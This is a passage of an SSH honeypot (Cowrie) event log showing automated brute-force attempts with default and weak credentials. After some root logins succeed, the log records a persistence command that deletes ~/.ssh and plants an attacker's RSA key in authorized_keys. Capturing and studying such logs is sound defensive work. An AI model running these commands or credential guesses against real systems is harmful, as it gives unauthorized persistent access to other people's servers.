0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:53:15.948896Z","src_ip":"217.154.1.158","session":"9c0769ee3c3f"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"weblogic","message":"login attempt [weblogic/weblogic] failed","sensor":"my-vps","timestamp":"2025-08-26T19:53:15.992531Z","src_ip":"217.154.1.158","session":"9c0769ee3c3f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:53:17.014455Z","src_ip":"217.154.1.158","session":"9c0769ee3c3f"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":32884,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e96c10b6be9","protocol":"ssh","message":"New connection: 217.154.1.158:32884 (1.2.3.4:22) [session: 1e96c10b6be9]","sensor":"my-vps","timestamp":"2025-08-26T19:53:33.486343Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:53:33.487485Z","src_ip":"217.154.1.158","session":"1e96c10b6be9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:53:33.501768Z","src_ip":"217.154.1.158","session":"1e96c10b6be9"}
{"eventid":"cowrie.login.failed","username":"centos","password":"123456","message":"login attempt [centos/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:53:33.547549Z","src_ip":"217.154.1.158","session":"1e96c10b6be9"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:53:34.563896Z","src_ip":"217.154.1.158","session":"1e96c10b6be9"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":47140,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f73ff9b3a6a","protocol":"ssh","message":"New connection: 217.154.1.158:47140 (1.2.3.4:22) [session: 3f73ff9b3a6a]","sensor":"my-vps","timestamp":"2025-08-26T19:53:50.975531Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:53:50.977974Z","src_ip":"217.154.1.158","session":"3f73ff9b3a6a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:53:50.996359Z","src_ip":"217.154.1.158","session":"3f73ff9b3a6a"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam","message":"login attempt [steam/steam] failed","sensor":"my-vps","timestamp":"2025-08-26T19:53:51.040868Z","src_ip":"217.154.1.158","session":"3f73ff9b3a6a"}
{"eventid":"cowrie.session.connect","src_ip":"202.10.34.9","src_port":37688,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4c51c9aa91a","protocol":"ssh","message":"New connection: 202.10.34.9:37688 (1.2.3.4:22) [session: e4c51c9aa91a]","sensor":"my-vps","timestamp":"2025-08-26T19:53:51.913022Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:53:51.914058Z","src_ip":"202.10.34.9","session":"e4c51c9aa91a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:53:52.056780Z","src_ip":"217.154.1.158","session":"3f73ff9b3a6a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:53:52.098250Z","src_ip":"202.10.34.9","session":"e4c51c9aa91a"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin123!@#","message":"login attempt [root/Admin123!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:53:52.865924Z","src_ip":"202.10.34.9","session":"e4c51c9aa91a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:53:53.293427Z","src_ip":"202.10.34.9","session":"e4c51c9aa91a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:53:53.294261Z","src_ip":"202.10.34.9","session":"e4c51c9aa91a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:53:53.295229Z","src_ip":"202.10.34.9","session":"e4c51c9aa91a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:53:54.084077Z","src_ip":"202.10.34.9","session":"e4c51c9aa91a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:53:54.337685Z","src_ip":"202.10.34.9","session":"e4c51c9aa91a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:53:54.338492Z","src_ip":"202.10.34.9","session":"e4c51c9aa91a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:53:54.522516Z","src_ip":"202.10.34.9","session":"e4c51c9aa91a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:53:54.523582Z","src_ip":"202.10.34.9","session":"e4c51c9aa91a"}
{"eventid":"cowrie.session.connect","src_ip":"202.10.34.9","src_port":37700,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c707ccfb834","protocol":"ssh","message":"New connection: 202.10.34.9:37700 (1.2.3.4:22) [session: 2c707ccfb834]","sensor":"my-vps","timestamp":"2025-08-26T19:53:54.701182Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:53:54.702142Z","src_ip":"202.10.34.9","session":"2c707ccfb834"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:53:54.882952Z","src_ip":"202.10.34.9","session":"2c707ccfb834"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:53:55.649440Z","src_ip":"202.10.34.9","session":"2c707ccfb834"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:53:56.834153Z","src_ip":"202.10.34.9","session":"2c707ccfb834"}
{"eventid":"cowrie.session.connect","src_ip":"202.10.34.9","src_port":41522,"dst_ip":"1.2.3.4","dst_port":22,"session":"921b04f1f8ad","protocol":"ssh","message":"New connection: 202.10.34.9:41522 (1.2.3.4:22) [session: 921b04f1f8ad]","sensor":"my-vps","timestamp":"2025-08-26T19:53:57.016858Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:53:57.017931Z","src_ip":"202.10.34.9","session":"921b04f1f8ad"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.71.41","src_port":50580,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c34670cd561","protocol":"ssh","message":"New connection: 83.168.71.41:50580 (1.2.3.4:22) [session: 5c34670cd561]","sensor":"my-vps","timestamp":"2025-08-26T19:53:57.111152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:53:57.112426Z","src_ip":"83.168.71.41","session":"5c34670cd561"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:53:57.130379Z","src_ip":"83.168.71.41","session":"5c34670cd561"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:53:57.202028Z","src_ip":"202.10.34.9","session":"921b04f1f8ad"}
{"eventid":"cowrie.login.success","username":"root","password":"qazWSXedc123!@#","message":"login attempt [root/qazWSXedc123!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:53:57.240511Z","src_ip":"83.168.71.41","session":"5c34670cd561"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:53:57.294757Z","src_ip":"83.168.71.41","session":"5c34670cd561"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:53:57.295481Z","src_ip":"83.168.71.41","session":"5c34670cd561"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:53:57.296735Z","src_ip":"83.168.71.41","session":"5c34670cd561"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:53:57.315670Z","src_ip":"83.168.71.41","session":"5c34670cd561"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:53:57.497517Z","src_ip":"83.168.71.41","session":"5c34670cd561"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:53:57.498295Z","src_ip":"83.168.71.41","session":"5c34670cd561"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:53:57.517630Z","src_ip":"83.168.71.41","session":"5c34670cd561"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:53:57.518484Z","src_ip":"83.168.71.41","session":"5c34670cd561"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.71.41","src_port":49566,"dst_ip":"1.2.3.4","dst_port":22,"session":"899bd6fc22d5","protocol":"ssh","message":"New connection: 83.168.71.41:49566 (1.2.3.4:22) [session: 899bd6fc22d5]","sensor":"my-vps","timestamp":"2025-08-26T19:53:57.534486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:53:57.535077Z","src_ip":"83.168.71.41","session":"899bd6fc22d5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:53:57.553110Z","src_ip":"83.168.71.41","session":"899bd6fc22d5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:53:57.664809Z","src_ip":"83.168.71.41","session":"899bd6fc22d5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:53:58.092433Z","src_ip":"202.10.34.9","session":"921b04f1f8ad"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:53:58.278584Z","src_ip":"202.10.34.9","session":"921b04f1f8ad"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:53:58.279485Z","src_ip":"202.10.34.9","session":"e4c51c9aa91a"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:53:58.685149Z","src_ip":"83.168.71.41","session":"899bd6fc22d5"}
